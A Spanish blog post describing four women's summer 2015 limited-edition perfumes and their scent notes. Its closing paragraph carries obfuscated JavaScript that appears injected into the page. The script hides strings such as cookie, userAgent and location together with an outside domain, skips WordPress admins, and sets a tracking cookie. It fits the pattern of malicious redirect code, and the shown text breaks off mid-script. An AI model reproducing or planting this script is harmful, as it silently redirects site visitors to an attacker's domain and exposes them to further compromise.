perfumes de verano de mujer de 2015

Con las buenas temperaturas las marcas lanzan al mercado versiones de sus clásicos perfumes más frescas y ligeras que nos invitan con su aromas a los paraísos más idílicos en un sólo abrir y cerrar de ojos.

Una de las casas de perfumes más fieles a sus versiones de verano es Issey Miyake que para este año nos presenta L’Eau D’Issey Summer 2015 una fragancia femenina floral con toques frutales en la que predomina la Pitahaya o Fruta del Dragón se trata de una fruta originaria de México y América Central.

perfume de verano issey miyake

 

 

 

 

 

 

 

 

 

 

 

 

En sus notas de salida encontramos el litchi y el pomelo aportando el toque cítrico al perfume. De corazón encontramos la Pitahaya conjuntamente con guayaba y maracuyá aportando el toque exótico junto con ligeros acordes florales. Un toque de vainilla se encarga de endulzar el perfume. En cuanto al packaging encontramos las ilustraciones de la artista Yulia Brodskaya.

Seguimos con Calvin Klein, con la versión de verano de su conocido perfume Eternity woman que como ya nos viene acostumbrando la marca detrás de cada fragancia hay una historia, y en este caso Eternity woman Summer 2015 personifica la sensación de dejarse llevar por la belleza de un horizonte en el que un extenso mar infinito converge en un cielo de verano lleno de color.
El perfume de verano se origina con la frescura de una pera verde realzada por un toque de sandía fresca y mandarina jugosa.
En el corazón de la fragancia florecen exuberantes pétalos de peonía junto con un dulce Jacinto azul y un brillante nenúfar, que dejan paso a la seductora calidez de la cremosa madera de sándalo, el delicado ámbar blanco y la sensualidad del almizcle.

perfume eternity summer 2015

 

 

 

 

 

 

 

 

 

 

 

Continuamos con el perfume de mujer de edición limitada de verano de Classique Summer 2015 de Jean Paul Gaultier en el cual su diseño viene inspirado en la vida salvaje del continente indio. El busto femenino siempre característico del frasco  de Jean Paul Gaultier está decorado con motivos que nos trasladan a la India entre los que destaca el imponente leopardo indio.

perfume le classique summer 2015

 

 

 

 

 

 

 

 

 

 

 

Su aroma oriental floral destaca por sus notas de salida con limón, mandarina, clementina, flor de azahar de naranjo y rosa que aportan un toque cítrico. Continuamos con jazmín sambac, ylang-ylang, iris y lirio de los valles aportando el toque floral. Para acabar con un toque de vainilla, almizcle y ámbar.

Para finalizar Giorgio Armani lanzá Armani Code Pour Femme Summer 2015, inspirada en el brillo del sol del sur de Italia y la frescura del aire del Mediterráneo: la nueva interpretación de la seducción. Características del azahar, sorbete de pera, jengibre, almizcle y la creación de una fragancia sensual fresca. Estamos convencidos de que su aroma no te dejará indiferente.

perfume armani code summer 2015

 

 

 

 

 

 

 

 

 

 

 

¿Cuál de estos perfumes de verano te gustaría probar? ¿Soléis cambiar de perfume en la temporada estival? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone